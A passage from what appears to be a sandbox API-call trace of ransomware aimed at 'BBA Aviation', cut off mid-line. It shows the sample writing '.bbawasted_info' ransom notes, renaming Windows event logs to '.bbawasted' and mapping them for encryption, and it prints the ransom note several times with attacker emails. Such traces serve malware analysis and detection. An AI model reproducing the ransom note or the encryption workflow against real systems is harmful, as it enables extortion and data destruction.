[0182.450] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.450] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0182.451] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0182.451] CloseHandle (hObject=0x294) returned 1 [0182.460] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0182.460] CloseHandle (hObject=0x280) returned 1 [0182.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0182.460] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0182.461] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0182.461] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0182.462] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6d68) returned 1 [0182.462] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0182.462] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0182.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0182.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0182.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.474] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Pm5y22R6Hd2j1Ruv4ZdEsBy4cDCKVrB6ljyTxQQDIFBQUMXmwK43MyfqnwfWUFFq\r\nwKd/2P20CU+ejnoeIIuWGn14l9Oo5YpoxjfTJy35/V3e8cxUULOYwpxBEAMvsp6n\r\nN+mGFpQk3RfYqjWd9MQ5iUbgoopb13cEWTRQlpFnu4e/7CAcT6AEQU5BLyKHiHVN\r\nHDrGo1qbDKERmnFbCKvV2V58Y/ghjCdMvXm0QZfGNwoFgKV5YJih5mG9egl57/0N\r\nnmqChQw8aNWMYra8NZc0/1R7FvZ0KbxGIeXGe2Iv3HnBd5ZxWvaTlXzMBYNCS6qA\r\noahiqrHDmuoVFJmCPx9CQBrQuSZdXWEH7MCiz8Ui3TAXPi9Nn942LeVbdqHsSYZo\r\nK3U1fMlFkyjVQxLwiLOqt+1s23UsS2+3dTGobmUEQO6U6s1e/70dnP2HqSJ2iPQV\r\nC2kY2OLAmVoBfezHsIRTdUrzauke+CFwOoULIy3w+cBfT0JUhjDoItmykdiwOKsD\r\nyyHoNiMJEL7bMfMjzKrUOzUzj8VVNSclbzx4eaF1ZIpOHSAw2Px4UtvE7BS/GnC1\r\nSN3GEgw+qLQVVKZWfaaqp8EcVdPjX2rrTIEWk/cy9My1r6ctOVO1foQRi/knJ2BM\r\nApAYzoELqCwDjxnYyG/KbHDTK/dpxRlgDB99UbxQmA9=[end_key]\r\nKEEP IT\r\n") returned 984 [0182.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0182.474] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0182.474] SetEndOfFile (hFile=0x28c) returned 1 [0182.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.546] CloseHandle (hObject=0x28c) returned 1 [0182.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0182.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x679e58 | out: hHeap=0x660000) returned 1 [0182.549] _aulldvrm () returned 0x0 [0182.549] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0182.549] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0182.549] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0182.549] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx") returned 69 [0182.550] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x294) returned 0x6aecf0 [0182.550] lstrcpyW (in: lpString1=0x6aed7a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0182.550] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.550] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0182.550] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0182.550] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0182.550] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0182.551] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0182.552] SetEndOfFile (hFile=0x28c) returned 1 [0182.552] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0182.552] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.552] lstrcpyW (in: lpString1=0x6aed7a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0182.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.bbawasted")) returned 1 [0182.553] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0182.553] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0182.554] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0182.554] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0182.554] CloseHandle (hObject=0x280) returned 1 [0182.564] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0182.565] CloseHandle (hObject=0x294) returned 1 [0182.565] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0182.565] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6ce0) returned 1 [0182.565] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0182.565] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0182.566] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5e88) returned 1 [0182.566] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0182.566] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0182.576] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0182.576] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0182.576] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.576] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]d3QSLlbaz73V2I4E2I3no11ZpJf8Mxw0kCuyIs4TnDlv9VNwNYMjGQW4U8yFbfwr\r\nDM05qBAOCdZdhd9xfDJT/GEl+w777FsYyQ2FeZ0pgFIdTog7yAGeev04kwRT87kP\r\nrzXAHH02q8rXZ8xIYmKZoleSSiPUQx5R6ATROtMAI/ImNrWzFPaB8FVEsKYF+Hk9\r\nRL8MAsc9sgRtxjEAdQfkhvHhZdSrClYyPHidA+hHCMiUdB4dhPQw5C/UyJ1Z1U9r\r\nmkwdc14f6TRjJutCGX1l3Mwo5C5BdH80F5v3vmc1sdXFMqGN0C7X5MpgofmZbvLL\r\nyHG2y4+PrHv2+UfwFA+eoe+BvW4ifhvhQKyE5BLpjr6o+1NU5BgHXEQy2nRp0vwn\r\nMWqQ7b086pFW5GCHMPYt7CBDEz/yDJMevGigHnSFQQ1qkg7WZHIugFlqNvLDLLGR\r\nJoIKzIEWr3tzIojsIpN0IZXz4bNxmMKPcNw2SWmTPlkQ73FPvJmwahFa3Mz1rl/0\r\nAc1o4juR1saMDLrHjnrBwMh13W83GW/mOb/48mDDJEXFKrExp+7AZDt2XlFgGURi\r\nvnXzerho2cCSglNWcP9G8lq1jBog2pWqIpRSe2nFMvFKUNzYEtvfxCrb4iQgm0DN\r\nrGEyLf9RiqnSEtQ58QzY1mY/5X8f2SPVTxGlm9LOUoL=[end_key]\r\nKEEP IT\r\n") returned 984 [0182.576] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0182.576] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0182.576] SetEndOfFile (hFile=0x28c) returned 1 [0182.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.579] CloseHandle (hObject=0x28c) returned 1 [0182.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0182.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e778 | out: hHeap=0x660000) returned 1 [0182.832] _aulldvrm () returned 0x0 [0182.832] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0182.833] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0182.833] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0182.833] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 68 [0182.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x292) returned 0x69e580 [0182.833] lstrcpyW (in: lpString1=0x69e608, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0182.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.833] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5e88) returned 1 [0182.834] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0182.834] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0182.834] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0182.834] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0182.835] SetEndOfFile (hFile=0x28c) returned 1 [0182.835] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0182.835] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.835] lstrcpyW (in: lpString1=0x69e608, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0182.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.bbawasted")) returned 1 [0182.836] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0182.836] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.837] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0182.837] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0182.837] CloseHandle (hObject=0x294) returned 1 [0182.842] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0182.842] CloseHandle (hObject=0x280) returned 1 [0182.842] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0182.843] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6c58) returned 1 [0182.843] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0182.843] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0182.843] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0182.844] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0182.844] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0182.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0182.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0182.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.852] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kRmvY2Ao+5XSONJNEDT3fg0+OWyZr309J9DuvqEeOsqi/USr++oBEuxBxYXer8UD\r\nOJEHhTII8EXPNPInMyWUr2HLmInkvLzBrFpY6b43MshVfnvYLFMpHdmq8gn6RtOl\r\nYUNNl7VQHNDiquwC508PlzP+9jD5jyuzalbZeabxH5XHLPr5mlVN8nlJ37ZEiksv\r\nTPbfoGUpVBZ+8PTvNUl1RsXx/8fE3CyXb8c0kre7yaIflB+gAUhH0PKHBGBqqR5T\r\nTBIkHj2e2JryXL3sIj8hsTs+5kR+SEOCPY9P/C//LsnbdgvRx1jJbaEE8KUj0Bl6\r\nV2Tr3+j20Uc5tEEI2zzQ97uT7GgsxbRT9YZJsZ8LAJrdRTdJ19PbOfPLzJdYc6d+\r\nhccJWrGdee/h7hLMvCiOTrPgNDaMXTzDcgmJ9xERJTmrQpVaQTtKs/fZSi65EdH3\r\nunlti6EsU0yzUt6aVU3YDWF/p5rEso64/d4zuqZ2uzfvWaCckN+X0MVZuz39mI9M\r\nGOHPho3uvGAh2GlrIeNtW2shK8306arLd6g+/L11TwyH6yW+r8XmzHHMlDKiMWOq\r\nVgk6PRLL8UnZsAo4TrbTSYcxBYNOQ6z62SOg0abXt7K2iH43qY47w+SefW0iZzjV\r\ne9C8oILgtNBeYR33iFK6YF43kg6NRkrIMHozg/FVkWl=[end_key]\r\nKEEP IT\r\n") returned 984 [0182.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0182.852] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0182.853] SetEndOfFile (hFile=0x28c) returned 1 [0182.855] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0182.855] CloseHandle (hObject=0x28c) returned 1 [0182.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e580 | out: hHeap=0x660000) returned 1 [0182.864] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e860 | out: hHeap=0x660000) returned 1 [0182.864] _aulldvrm () returned 0x0 [0182.864] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0182.865] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0182.865] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0182.865] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 58 [0182.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27e) returned 0x6aecf0 [0182.865] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0182.865] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0182.865] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6680) returned 1 [0182.866] CryptGenRandom (in: hProv=0x6a6680, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0182.866] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0182.866] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0183.038] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0183.045] SetEndOfFile (hFile=0x28c) returned 1 [0183.045] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.046] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0183.046] lstrcpyW (in: lpString1=0x6aed64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0183.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.bbawasted")) returned 1 [0183.047] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0183.047] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0183.047] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0183.047] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0183.047] CloseHandle (hObject=0x280) returned 1 [0183.057] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0183.058] CloseHandle (hObject=0x294) returned 1 [0183.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0183.058] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6b48) returned 1 [0183.059] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0183.059] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0183.059] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0183.060] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0183.060] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0183.070] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0183.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0183.071] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0183.071] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 